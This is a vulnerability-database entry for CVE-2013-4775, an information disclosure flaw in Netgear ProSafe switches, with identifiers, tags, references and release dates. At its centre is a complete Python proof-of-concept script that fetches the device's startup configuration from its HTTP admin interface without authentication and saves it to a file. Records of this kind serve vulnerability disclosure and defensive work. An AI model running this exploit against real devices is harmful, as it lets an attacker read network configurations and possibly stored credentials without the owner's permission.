ID
VAR-E-201308-0138
CVE
| cve_id: | CVE-2013-4775 | Trust: 3.6 |
| cve_id: | CVE-2013-4776 | Trust: 0.8 |
EDB ID
27774
TITLE
Netgear ProSafe - Information Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear ProSafe - Information Disclosure. CVE-2013-4775CVE-96476 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | prosafe | scope: | - | version: | - | Trust: 3.3 |
EXPLOIT
#!/usr/bin/python
################################################################
# #
# Netgear ProSafe - CVE-2013-4775 PoC #
# written by Juan J. Guelfo @ Encripto AS #
# post@encripto.no #
# #
# Copyright 2013 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################
import sys, getopt, urllib2
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"
# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Netgear ProSafe - CVE-2013-4775 PoC \t\t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""
# Prints help
def help():
header()
print """
Usage: python CVE-2013-4775.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
-o file ...Output file where the config will be written to
Example:
python CVE-2013-4775.py -t 192.168.0.1 -p 80 -o output.txt
"""
sys.exit(0)
if __name__ == '__main__':
#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:o:", ["target=", "port=", "output="])
except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)
if not options:
help()
target = None
port = None
output = None
reset = None
for opt, arg in options:
if opt in ("-t"):
target = arg
if opt in ("-p"):
port = arg
if opt in ("-o"):
output = arg
#Option input validation
if not target or not port or not output:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)
header()
print "[+] Trying to connect to {0}:{1}...".format(target, port)
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
try:
# Get the startup config via HTTP admin interface
r = urllib2.Request("http://%s:%s/filesystem/startup-config" % (target, port), None, headers)
startup_config = urllib2.urlopen(r).read()
print "[+] Connected..."
# Write results to output file
print "[+] Writing startup config to {0}...\n".format(output)
fw = open(output, 'w')
fw.write(startup_config)
fw.close()
except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"
except IOError as e:
print "[-] Error: {0}...\n".format(e.strerror)
sys.exit(0)
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Information Disclosure Vulnerability
Trust: 1.2
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | denial of service | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | proof of concept | Trust: 0.5 |
| tag: | info disclosure | Trust: 0.5 |
CREDITS
Juan J. Guelfo
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-4775 | Trust: 3.6 |
| db: | EXPLOIT-DB | id: | 27774 | Trust: 1.6 |
| db: | NVD | id: | CVE-2013-4776 | Trust: 0.8 |
| db: | EDBNET | id: | 49627 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 21149 | Trust: 0.6 |
| db: | EDBNET | id: | 20983 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 21150 | Trust: 0.6 |
| db: | EDBNET | id: | 20984 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 122905 | Trust: 0.5 |
| db: | BID | id: | 61924 | Trust: 0.3 |
| db: | BID | id: | 61918 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-4775 | Trust: 3.3 |
| url: | http://www.netgear.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/27774/ | Trust: 0.6 |
| url: | https://0day.today/exploits/21149 | Trust: 0.6 |
| url: | https://0day.today/exploits/21150 | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-4776 | Trust: 0.5 |
SOURCES
| db: | BID | id: | 61924 |
| db: | BID | id: | 61918 |
| db: | PACKETSTORM | id: | 122905 |
| db: | EXPLOIT-DB | id: | 27774 |
| db: | EDBNET | id: | 49627 |
| db: | EDBNET | id: | 20983 |
| db: | EDBNET | id: | 20984 |
LAST UPDATE DATE
2022-07-27T09:40:26.559000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 61924 | date: | 2013-08-21T00:00:00 |
| db: | BID | id: | 61918 | date: | 2013-08-21T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 61924 | date: | 2013-08-21T00:00:00 |
| db: | BID | id: | 61918 | date: | 2013-08-21T00:00:00 |
| db: | PACKETSTORM | id: | 122905 | date: | 2013-08-22T02:13:52 |
| db: | EXPLOIT-DB | id: | 27774 | date: | 2013-08-22T00:00:00 |
| db: | EDBNET | id: | 49627 | date: | 2013-08-22T00:00:00 |
| db: | EDBNET | id: | 20983 | date: | 2013-08-22T00:00:00 |
| db: | EDBNET | id: | 20984 | date: | 2013-08-22T00:00:00 |